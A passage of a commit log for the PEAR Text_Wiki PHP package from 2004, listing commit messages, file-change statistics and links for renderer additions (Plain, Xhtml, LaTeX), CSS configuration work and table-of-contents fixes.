 Text/Wiki/Render/Plain/Html.php          | 24 +++++++++++
 Text/Wiki/Render/Plain/Image.php         | 22 +++++++++++
 Text/Wiki/Render/Plain/Include.php       |  8 ++++
 Text/Wiki/Render/Plain/Interwiki.php     | 23 +++++++++++
 Text/Wiki/Render/Plain/Italic.php        | 23 +++++++++++
 Text/Wiki/Render/Plain/List.php          | 68 ++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Newline.php       | 12 ++++++
 Text/Wiki/Render/Plain/Paragraph.php     | 31 +++++++++++++++
 Text/Wiki/Render/Plain/Phplookup.php     | 25 ++++++++++++
 Text/Wiki/Render/Plain/Prefilter.php     | 40 +++++++++++++++++++
 Text/Wiki/Render/Plain/Raw.php           | 23 +++++++++++
 Text/Wiki/Render/Plain/Revise.php        | 24 +++++++++++
 Text/Wiki/Render/Plain/Strong.php        | 24 +++++++++++
 Text/Wiki/Render/Plain/Superscript.php   | 23 +++++++++++
 Text/Wiki/Render/Plain/Table.php         | 57 ++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Tighten.php       | 10 +++++
 Text/Wiki/Render/Plain/Toc.php           | 39 ++++++++++++++++++
 Text/Wiki/Render/Plain/Translatehtml.php |  9 +++++
 Text/Wiki/Render/Plain/Tt.php            | 24 +++++++++++
 Text/Wiki/Render/Plain/Url.php           | 25 ++++++++++++
 Text/Wiki/Render/Plain/Wikilink.php      | 24 +++++++++++
 35 files changed, 925 insertions(+)
 create mode 100644 Text/Wiki/Render/Plain/Anchor.php
 create mode 100755 Text/Wiki/Render/Plain/Blockquote.php
 create mode 100755 Text/Wiki/Render/Plain/Bold.php
 create mode 100755 Text/Wiki/Render/Plain/Break.php
 create mode 100755 Text/Wiki/Render/Plain/Center.php
 create mode 100755 Text/Wiki/Render/Plain/Code.php
 create mode 100755 Text/Wiki/Render/Plain/Colortext.php
 create mode 100755 Text/Wiki/Render/Plain/Deflist.php
 create mode 100755 Text/Wiki/Render/Plain/Delimiter.php
 create mode 100755 Text/Wiki/Render/Plain/Embed.php
 create mode 100755 Text/Wiki/Render/Plain/Emphasis.php
 create mode 100755 Text/Wiki/Render/Plain/Freelink.php
 create mode 100755 Text/Wiki/Render/Plain/Heading.php
 create mode 100755 Text/Wiki/Render/Plain/Horiz.php
 create mode 100755 Text/Wiki/Render/Plain/Html.php
 create mode 100755 Text/Wiki/Render/Plain/Image.php
 create mode 100755 Text/Wiki/Render/Plain/Include.php
 create mode 100755 Text/Wiki/Render/Plain/Interwiki.php
 create mode 100755 Text/Wiki/Render/Plain/Italic.php
 create mode 100755 Text/Wiki/Render/Plain/List.php
 create mode 100755 Text/Wiki/Render/Plain/Newline.php
 create mode 100755 Text/Wiki/Render/Plain/Paragraph.php
 create mode 100755 Text/Wiki/Render/Plain/Phplookup.php
 create mode 100755 Text/Wiki/Render/Plain/Prefilter.php
 create mode 100755 Text/Wiki/Render/Plain/Raw.php
 create mode 100755 Text/Wiki/Render/Plain/Revise.php
 create mode 100755 Text/Wiki/Render/Plain/Strong.php
 create mode 100755 Text/Wiki/Render/Plain/Superscript.php
 create mode 100755 Text/Wiki/Render/Plain/Table.php
 create mode 100755 Text/Wiki/Render/Plain/Tighten.php
 create mode 100755 Text/Wiki/Render/Plain/Toc.php
 create mode 100755 Text/Wiki/Render/Plain/Translatehtml.php
 create mode 100755 Text/Wiki/Render/Plain/Tt.php
 create mode 100755 Text/Wiki/Render/Plain/Url.php
 create mode 100755 Text/Wiki/Render/Plain/Wikilink.php

http://github.com/horde/horde/commit/05ef3d09ecba2c2495184571c1f1f962ec55a543

-----------------------------------------------------------------------

commit 70829bcc3d687ed9b6e1fd5a4aece33457539a27
Author: Paul M Jones 
Date:   Tue Jul 20 15:53:02 2004 +0000

    re-added Xhtml renderer files
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163764 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php        |  31 ++++++
 Text/Wiki/Render/Xhtml/Blockquote.php    |  47 ++++++++++
 Text/Wiki/Render/Xhtml/Bold.php          |  29 ++++++
 Text/Wiki/Render/Xhtml/Break.php         |  24 +++++
 Text/Wiki/Render/Xhtml/Center.php        |  31 ++++++
 Text/Wiki/Render/Xhtml/Code.php          |  92 ++++++++++++++++++
 Text/Wiki/Render/Xhtml/Colortext.php     |  56 +++++++++++
 Text/Wiki/Render/Xhtml/Deflist.php       |  91 ++++++++++++++++++
 Text/Wiki/Render/Xhtml/Delimiter.php     |  23 +++++
 Text/Wiki/Render/Xhtml/Embed.php         |  23 +++++
 Text/Wiki/Render/Xhtml/Emphasis.php      |  29 ++++++
 Text/Wiki/Render/Xhtml/Freelink.php      |  64 +++++++++++++
 Text/Wiki/Render/Xhtml/Heading.php       |  19 ++++
 Text/Wiki/Render/Xhtml/Horiz.php         |  23 +++++
 Text/Wiki/Render/Xhtml/Html.php          |  24 +++++
 Text/Wiki/Render/Xhtml/Image.php         |  67 +++++++++++++
 Text/Wiki/Render/Xhtml/Include.php       |   8 ++
 Text/Wiki/Render/Xhtml/Interwiki.php     |  60 ++++++++++++
 Text/Wiki/Render/Xhtml/Italic.php        |  29 ++++++
 Text/Wiki/Render/Xhtml/List.php          | 156 +++++++++++++++++++++++++++++++
 Text/Wiki/Render/Xhtml/Newline.php       |  12 +++
 Text/Wiki/Render/Xhtml/Paragraph.php     |  31 ++++++
 Text/Wiki/Render/Xhtml/Phplookup.php     |  32 +++++++
 Text/Wiki/Render/Xhtml/Prefilter.php     |  40 ++++++++
 Text/Wiki/Render/Xhtml/Raw.php           |  23 +++++
 Text/Wiki/Render/Xhtml/Revise.php        |  38 ++++++++
 Text/Wiki/Render/Xhtml/Strong.php        |  30 ++++++
 Text/Wiki/Render/Xhtml/Superscript.php   |  29 ++++++
 Text/Wiki/Render/Xhtml/Table.php         | 126 +++++++++++++++++++++++++
 Text/Wiki/Render/Xhtml/Tighten.php       |  10 ++
 Text/Wiki/Render/Xhtml/Toc.php           |  64 +++++++++++++
 Text/Wiki/Render/Xhtml/Translatehtml.php |   9 ++
 Text/Wiki/Render/Xhtml/Tt.php            |  30 ++++++
 Text/Wiki/Render/Xhtml/Url.php           |  77 +++++++++++++++
 Text/Wiki/Render/Xhtml/Wikilink.php      |  76 +++++++++++++++
 35 files changed, 1553 insertions(+)
 create mode 100644 Text/Wiki/Render/Xhtml/Anchor.php
 create mode 100755 Text/Wiki/Render/Xhtml/Blockquote.php
 create mode 100755 Text/Wiki/Render/Xhtml/Bold.php
 create mode 100755 Text/Wiki/Render/Xhtml/Break.php
 create mode 100755 Text/Wiki/Render/Xhtml/Center.php
 create mode 100755 Text/Wiki/Render/Xhtml/Code.php
 create mode 100755 Text/Wiki/Render/Xhtml/Colortext.php
 create mode 100755 Text/Wiki/Render/Xhtml/Deflist.php
 create mode 100755 Text/Wiki/Render/Xhtml/Delimiter.php
 create mode 100755 Text/Wiki/Render/Xhtml/Embed.php
 create mode 100755 Text/Wiki/Render/Xhtml/Emphasis.php
 create mode 100755 Text/Wiki/Render/Xhtml/Freelink.php
 create mode 100755 Text/Wiki/Render/Xhtml/Heading.php
 create mode 100755 Text/Wiki/Render/Xhtml/Horiz.php
 create mode 100755 Text/Wiki/Render/Xhtml/Html.php
 create mode 100755 Text/Wiki/Render/Xhtml/Image.php
 create mode 100755 Text/Wiki/Render/Xhtml/Include.php
 create mode 100755 Text/Wiki/Render/Xhtml/Interwiki.php
 create mode 100755 Text/Wiki/Render/Xhtml/Italic.php
 create mode 100755 Text/Wiki/Render/Xhtml/List.php
 create mode 100755 Text/Wiki/Render/Xhtml/Newline.php
 create mode 100755 Text/Wiki/Render/Xhtml/Paragraph.php
 create mode 100755 Text/Wiki/Render/Xhtml/Phplookup.php
 create mode 100755 Text/Wiki/Render/Xhtml/Prefilter.php
 create mode 100755 Text/Wiki/Render/Xhtml/Raw.php
 create mode 100755 Text/Wiki/Render/Xhtml/Revise.php
 create mode 100755 Text/Wiki/Render/Xhtml/Strong.php
 create mode 100755 Text/Wiki/Render/Xhtml/Superscript.php
 create mode 100755 Text/Wiki/Render/Xhtml/Table.php
 create mode 100755 Text/Wiki/Render/Xhtml/Tighten.php
 create mode 100755 Text/Wiki/Render/Xhtml/Toc.php
 create mode 100755 Text/Wiki/Render/Xhtml/Translatehtml.php
 create mode 100755 Text/Wiki/Render/Xhtml/Tt.php
 create mode 100755 Text/Wiki/Render/Xhtml/Url.php
 create mode 100755 Text/Wiki/Render/Xhtml/Wikilink.php

http://github.com/horde/horde/commit/70829bcc3d687ed9b6e1fd5a4aece33457539a27

-----------------------------------------------------------------------

commit e8261948c4125582645e04d19c4b5be75c46381b
Author: Paul M Jones 
Date:   Tue Jul 20 15:55:43 2004 +0000

    updated with 0.20.1 release notes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163765 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 package.xml   | 5 +++--
 2 files changed, 4 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/e8261948c4125582645e04d19c4b5be75c46381b

-----------------------------------------------------------------------

commit bbd6e3e4e9fa5e655b11ad4e54b1d759ce306d58
Author: Paul M Jones 
Date:   Thu Aug 12 13:52:45 2004 +0000

    for deflist, must now use ": " (colon-space) at beginning and " : " (space-colon-space) to separate term from def; this it becuase URLs as terms were breaking the rule
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 166141 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Deflist.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/bbd6e3e4e9fa5e655b11ad4e54b1d759ce306d58

-----------------------------------------------------------------------

commit 9af387df4c8cac1c17a0a8db457b4c7aac90355a
Author: Paul M Jones 
Date:   Thu Aug 12 13:58:35 2004 +0000

    applied fix for bug 2095, CSS not honored in deflist rule (thanks for the patch,  glamm at a-s-i dot com)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 166143 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Deflist.php | 12 +++---------
 1 file changed, 3 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/9af387df4c8cac1c17a0a8db457b4c7aac90355a

-----------------------------------------------------------------------

commit a8a19b435ab2acb9c642de566742271124a641e3
Author: Paul M Jones 
Date:   Wed Aug 18 12:21:54 2004 +0000

    updated release date
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 166667 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/a8a19b435ab2acb9c642de566742271124a641e3

-----------------------------------------------------------------------

commit 4cf021591b1387ba983509391570ab838baaaf14
Author: Paul M Jones 
Date:   Wed Aug 18 12:23:32 2004 +0000

    updated version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 166669 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/4cf021591b1387ba983509391570ab838baaaf14

-----------------------------------------------------------------------

commit fbfb2a6361ba35c29701d8262cd544ac35948627
Author: Paul M Jones 
Date:   Fri Sep 17 14:51:29 2004 +0000

    added comment to credit contribution from Stephane le Solliec
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168726 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 41 +++++++++++++++++++++-------------------
 1 file changed, 22 insertions(+), 19 deletions(-)

http://github.com/horde/horde/commit/fbfb2a6361ba35c29701d8262cd544ac35948627

-----------------------------------------------------------------------

commit 73b32f5f3011b5bb0004571c39e0d083872a60eb
Author: Paul M Jones 
Date:   Fri Sep 17 15:28:32 2004 +0000

    URL "target"s are now XHTML compliant with suggestion from Aaron Kalin and JS code from youngpup.net
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168727 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Url.php | 18 ++++++++++++------
 1 file changed, 12 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/73b32f5f3011b5bb0004571c39e0d083872a60eb

-----------------------------------------------------------------------

commit 322511c64e303e943b0305c62a834fd76ae24d47
Author: Paul M Jones 
Date:   Fri Sep 17 15:45:43 2004 +0000

    add 'id' attrbute to token; this will let us generate better tables of contents
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168728 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Heading.php | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/322511c64e303e943b0305c62a834fd76ae24d47

-----------------------------------------------------------------------

commit 22614aa82870319dbfa9bb23376397d226463ffc
Author: Paul M Jones 
Date:   Fri Sep 17 15:51:37 2004 +0000

    added id_prefix conf element
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168729 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Heading.php | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/22614aa82870319dbfa9bb23376397d226463ffc

-----------------------------------------------------------------------

commit e39f1cec79cba6f556903db05ebd07cbca4a34eb
Author: Paul M Jones 
Date:   Fri Sep 17 23:17:22 2004 +0000

    continued working with new Heading and Toc rules for better, faster tables of contents (XHTML-compliant "div" support)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168736 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Embed.php            |  30 +++---
 Text/Wiki/Parse/Toc.php              | 195 ++++++-----------------------------
 Text/Wiki/Render/Xhtml/Heading.php   |   2 +-
 Text/Wiki/Render/Xhtml/Interwiki.php |  18 +++-
 Text/Wiki/Render/Xhtml/Toc.php       |  96 ++++++++++-------
 5 files changed, 123 insertions(+), 218 deletions(-)

http://github.com/horde/horde/commit/e39f1cec79cba6f556903db05ebd07cbca4a34eb

-----------------------------------------------------------------------

commit 5781d16295fe84a9cdecdd5ea5d1151b5d81bc2b
Author: Paul M Jones 
Date:   Fri Sep 17 23:48:00 2004 +0000

    changed version number in Wiki.php, continued tweaking Toc rendering and parameters
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168737 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                  |  2 +-
 Text/Wiki/Render/Xhtml/Toc.php | 10 +---------
 2 files changed, 2 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/5781d16295fe84a9cdecdd5ea5d1151b5d81bc2b

-----------------------------------------------------------------------

commit d6aea1d3c14c5898b2d38a4c0c32036c05e99f41
Author: Paul M Jones 
Date:   Sat Sep 18 00:06:15 2004 +0000

    now guesses width and height, and adds a pseudo-center alignment option (thanks Stephane Solliec)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168738 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 40 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)

http://github.com/horde/horde/commit/d6aea1d3c14c5898b2d38a4c0c32036c05e99f41

-----------------------------------------------------------------------

commit aa7c2d283c0cb55f20d1bc6cb343fe7fabc30ab4
Author: Paul M Jones 
Date:   Sat Sep 18 21:30:07 2004 +0000

    added formatConf() method to wrap a config value in an sprintf() format string (thanks Bob Glamm)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168764 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render.php | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)

http://github.com/horde/horde/commit/aa7c2d283c0cb55f20d1bc6cb343fe7fabc30ab4

-----------------------------------------------------------------------

commit 1f7ca2c2a5790fac0b034b3baf4aee538fb6b884
Author: Paul M Jones 
Date:   Sat Sep 18 21:30:32 2004 +0000

    added 'css' conf key (thanks Bob Glamm)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168765 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/1f7ca2c2a5790fac0b034b3baf4aee538fb6b884

-----------------------------------------------------------------------

commit ce033f46b531714ff3b4f85d82c01a29e527836b
Author: Paul M Jones 
Date:   Sat Sep 18 22:58:23 2004 +0000

    * Base Render class now has formatConf() method to wrap a config value in an sprintf() format
    * Added CSS class configuration keys for all appropriate rules (*big* thanks to Bob Glamm, glamm at a-s-i dot com, who did a ton of work on this) ... except Wikilink, Freelink, and Image -- more coming for those later
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168777 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Toc.php                |  2 +-
 Text/Wiki/Render/Xhtml/Blockquote.php  |  9 ++++---
 Text/Wiki/Render/Xhtml/Bold.php        |  7 +++++-
 Text/Wiki/Render/Xhtml/Break.php       |  7 +++++-
 Text/Wiki/Render/Xhtml/Center.php      |  2 --
 Text/Wiki/Render/Xhtml/Code.php        | 44 +++++++++++++++++++++-------------
 Text/Wiki/Render/Xhtml/Deflist.php     | 27 +++------------------
 Text/Wiki/Render/Xhtml/Emphasis.php    |  8 ++++++-
 Text/Wiki/Render/Xhtml/Heading.php     | 14 +++++++++--
 Text/Wiki/Render/Xhtml/Horiz.php       |  7 +++++-
 Text/Wiki/Render/Xhtml/Image.php       |  4 +++-
 Text/Wiki/Render/Xhtml/Interwiki.php   | 16 ++++++++-----
 Text/Wiki/Render/Xhtml/Italic.php      |  7 +++++-
 Text/Wiki/Render/Xhtml/List.php        | 22 ++++-------------
 Text/Wiki/Render/Xhtml/Paragraph.php   |  7 +++++-
 Text/Wiki/Render/Xhtml/Phplookup.php   | 39 ++++++++++++++++++++++++------
 Text/Wiki/Render/Xhtml/Revise.php      | 15 ++++++++----
 Text/Wiki/Render/Xhtml/Strong.php      |  7 +++++-
 Text/Wiki/Render/Xhtml/Superscript.php |  7 +++++-
 Text/Wiki/Render/Xhtml/Table.php       | 40 +++++--------------------------
 Text/Wiki/Render/Xhtml/Tt.php          |  7 +++++-
 Text/Wiki/Render/Xhtml/Url.php         | 22 +++++++++++------
 package.xml                            | 15 +++++++-----
 23 files changed, 192 insertions(+), 143 deletions(-)

http://github.com/horde/horde/commit/ce033f46b531714ff3b4f85d82c01a29e527836b

-----------------------------------------------------------------------

commit f189c398dc077746e963aa705f5f10abf6b3b33e
Author: Paul M Jones 
Date:   Sun Sep 19 02:56:27 2004 +0000

    * Render rules for Wikilink and Freelink are much more configurable: put new-link text before or after the page name, or use CSS only to control the look of new-links
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168780 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Freelink.php |  65 ++--------------------
 Text/Wiki/Render/Xhtml/Wikilink.php | 104 ++++++++++++++++++++++++++----------
 package.xml                         |   3 +-
 3 files changed, 82 insertions(+), 90 deletions(-)

http://github.com/horde/horde/commit/f189c398dc077746e963aa705f5f10abf6b3b33e

-----------------------------------------------------------------------

commit db71bf718a32cefc555ca31a67aff8daf857feed
Author: Paul M Jones 
Date:   Sun Sep 19 20:58:34 2004 +0000

    perfected the patches from Stephane le Solliec, image size guesses now work properly with non-local images
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168814 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 88 ++++++++++++++++++++++++++--------------
 1 file changed, 57 insertions(+), 31 deletions(-)

http://github.com/horde/horde/commit/db71bf718a32cefc555ca31a67aff8daf857feed

-----------------------------------------------------------------------

commit f64c5151ba6761fcf9e35629a5508fff0ec2aa1b
Author: Paul M Jones 
Date:   Sun Sep 19 21:31:50 2004 +0000

    fixed bug 2316: swapped processing order to Center and Newline
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168816 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/f64c5151ba6761fcf9e35629a5508fff0ec2aa1b

-----------------------------------------------------------------------

commit 57ed333df0ce800d716274fac065020cc3d92ee2
Author: Paul M Jones 
Date:   Sun Sep 19 21:41:26 2004 +0000

    finished "perfecting" CSS and linking in the Image rule
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168817 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 27 ++++++++++++++++++++-------
 package.xml                      |  9 +++++----
 2 files changed, 25 insertions(+), 11 deletions(-)

http://github.com/horde/horde/commit/57ed333df0ce800d716274fac065020cc3d92ee2

-----------------------------------------------------------------------

commit 68e5b84eb31925a0edac51a4392f73da028e85c2
Author: Paul M Jones 
Date:   Sun Sep 19 21:42:57 2004 +0000

    updated comments, put in release date
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168818 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/68e5b84eb31925a0edac51a4392f73da028e85c2

-----------------------------------------------------------------------

commit c2fb889f0bc65a2a1c89e74367fd5439c4d7a344
Author: Paul M Jones 
Date:   Sun Sep 19 21:45:06 2004 +0000

    added note about Toc generation
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 168819 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/c2fb889f0bc65a2a1c89e74367fd5439c4d7a344

-----------------------------------------------------------------------

commit 1cbc0afad0945315536b155ab231759eda45d600
Author: Paul M Jones 
Date:   Wed Sep 22 22:16:58 2004 +0000

    added keys for column and row counts in the 'table_start' token (to support LaTeX rendering)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169011 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Table.php | 54 +++++++++++++++++++++++++++++++++++------------
 1 file changed, 41 insertions(+), 13 deletions(-)

http://github.com/horde/horde/commit/1cbc0afad0945315536b155ab231759eda45d600

-----------------------------------------------------------------------

commit ac35f3b0686eb3bde818a2e2f0d3526146f00b83
Author: Paul M Jones 
Date:   Wed Sep 22 22:30:01 2004 +0000

    removed 'translatehtml' rule from the parse/render rule set; it is more appropriate for HTML translation to be part of the Xhtml "format" than a general processing rule (particularly when we start doing LaTeX and other non-HTML formats)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169012 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/ac35f3b0686eb3bde818a2e2f0d3526146f00b83

-----------------------------------------------------------------------

commit 7560e88358f4dbae9ac1a437f9e97eefaed65b65
Author: Paul M Jones 
Date:   Wed Sep 22 22:30:32 2004 +0000

    added HTML translation as part of the pre() method
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169013 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml.php | 19 ++++++++++++++++++-
 1 file changed, 18 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/7560e88358f4dbae9ac1a437f9e97eefaed65b65

-----------------------------------------------------------------------

commit 4b08ca31c137fc054a9fe8894f3f6f6afea605a5
Author: Paul M Jones 
Date:   Sat Sep 25 18:43:02 2004 +0000

    Wiki.php: whitespace changes
    
    Phplookup.php: added $id$ tag
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169206 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                        | 2 --
 Text/Wiki/Render/Xhtml/Phplookup.php | 2 ++
 2 files changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/4b08ca31c137fc054a9fe8894f3f6f6afea605a5

-----------------------------------------------------------------------

commit 7c4360b9fc41bf65998b6724cdfdb93523426f2e
Author: Paul M Jones 
Date:   Sat Sep 25 18:49:56 2004 +0000

    Jeremy Cowgar has kindly submitted a prelminary LaTeX renderer.  Thanks, Jeremy!
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 169208 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex.php               | 90 +++++++++++++++++++++++++++++++
 Text/Wiki/Render/Latex/Anchor.php        | 33 ++++++++++++
 Text/Wiki/Render/Latex/Blockquote.php    | 36 +++++++++++++
 Text/Wiki/Render/Latex/Bold.php          |  4 ++
 Text/Wiki/Render/Latex/Break.php         | 24 +++++++++
 Text/Wiki/Render/Latex/Center.php        | 33 ++++++++++++
 Text/Wiki/Render/Latex/Code.php          | 26 +++++++++
 Text/Wiki/Render/Latex/Colortext.php     | 58 ++++++++++++++++++++
 Text/Wiki/Render/Latex/Deflist.php       | 53 ++++++++++++++++++
 Text/Wiki/Render/Latex/Delimiter.php     | 25 +++++++++
 Text/Wiki/Render/Latex/Embed.php         | 23 ++++++++
 Text/Wiki/Render/Latex/Emphasis.php      | 29 ++++++++++
 Text/Wiki/Render/Latex/Freelink.php      | 34 ++++++++++++
 Text/Wiki/Render/Latex/Heading.php       | 33 ++++++++++++
 Text/Wiki/Render/Latex/Horiz.php         | 23 ++++++++
 Text/Wiki/Render/Latex/Html.php          | 25 +++++++++
 Text/Wiki/Render/Latex/Image.php         | 70 ++++++++++++++++++++++++
 Text/Wiki/Render/Latex/Include.php       |  8 +++
 Text/Wiki/Render/Latex/Interwiki.php     | 60 +++++++++++++++++++++
 Text/Wiki/Render/Latex/Italic.php        |  5 ++
 Text/Wiki/Render/Latex/List.php          | 57 ++++++++++++++++++++
 Text/Wiki/Render/Latex/Newline.php       | 12 +++++
 Text/Wiki/Render/Latex/Paragraph.php     | 31 +++++++++++
 Text/Wiki/Render/Latex/Phplookup.php     | 34 ++++++++++++
 Text/Wiki/Render/Latex/Prefilter.php     | 40 ++++++++++++++
 Text/Wiki/Render/Latex/Raw.php           | 23 ++++++++
 Text/Wiki/Render/Latex/Revise.php        | 38 +++++++++++++
 Text/Wiki/Render/Latex/Strong.php        | 30 +++++++++++
 Text/Wiki/Render/Latex/Superscript.php   | 31 +++++++++++
 Text/Wiki/Render/Latex/Table.php         | 93 ++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Latex/Tighten.php       | 10 ++++
 Text/Wiki/Render/Latex/Toc.php           | 30 +++++++++++
 Text/Wiki/Render/Latex/Translatehtml.php |  9 ++++
 Text/Wiki/Render/Latex/Tt.php            | 30 +++++++++++
 Text/Wiki/Render/Latex/Url.php           | 35 ++++++++++++
 Text/Wiki/Render/Latex/Wikilink.php      | 60 +++++++++++++++++++++
 36 files changed, 1255 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex.php
 create mode 100644 Text/Wiki/Render/Latex/Anchor.php
 create mode 100644 Text/Wiki/Render/Latex/Blockquote.php
 create mode 100644 Text/Wiki/Render/Latex/Bold.php
 create mode 100644 Text/Wiki/Render/Latex/Break.php
 create mode 100644 Text/Wiki/Render/Latex/Center.php
 create mode 100644 Text/Wiki/Render/Latex/Code.php
 create mode 100644 Text/Wiki/Render/Latex/Colortext.php
 create mode 100644 Text/Wiki/Render/Latex/Deflist.php
 create mode 100644 Text/Wiki/Render/Latex/Delimiter.php
 create mode 100644 Text/Wiki/Render/Latex/Embed.php
 create mode 100644 Text/Wiki/Render/Latex/Emphasis.php
 create mode 100644 Text/Wiki/Render/Latex/Freelink.php
 create mode 100644 Text/Wiki/Render/Latex/Heading.php
 create mode 100644 Text/Wiki/Render/Latex/Horiz.php
 create mode 100644 Text/Wiki/Render/Latex/Html.php
 create mode 100644 Text/Wiki/Render/Latex/Image.php
 create mode 100644 Text/Wiki/Render/Latex/Include.php
 create mode 100644 Text/Wiki/Render/Latex/Interwiki.php
 create mode 100644 Text/Wiki/Render/Latex/Italic.php
 create mode 100644 Text/Wiki/Render/Latex/List.php
 create mode 100644 Text/Wiki/Render/Latex/Newline.php
 create mode 100644 Text/Wiki/Render/Latex/Paragraph.php
 create mode 100644 Text/Wiki/Render/Latex/Phplookup.php
 create mode 100644 Text/Wiki/Render/Latex/Prefilter.php
 create mode 100644 Text/Wiki/Render/Latex/Raw.php
 create mode 100644 Text/Wiki/Render/Latex/Revise.php
 create mode 100644 Text/Wiki/Render/Latex/Strong.php
 create mode 100644 Text/Wiki/Render/Latex/Superscript.php
 create mode 100644 Text/Wiki/Render/Latex/Table.php
 create mode 100644 Text/Wiki/Render/Latex/Tighten.php
 create mode 100644 Text/Wiki/Render/Latex/Toc.php
 create mode 100644 Text/Wiki/Render/Latex/Translatehtml.php
 create mode 100644 Text/Wiki/Render/Latex/Tt.php
 create mode 100644 Text/Wiki/Render/Latex/Url.php
 create mode 100644 Text/Wiki/Render/Latex/Wikilink.php

http://github.com/horde/horde/commit/7c4360b9fc41bf65998b6724cdfdb93523426f2e

-----------------------------------------------------------------------

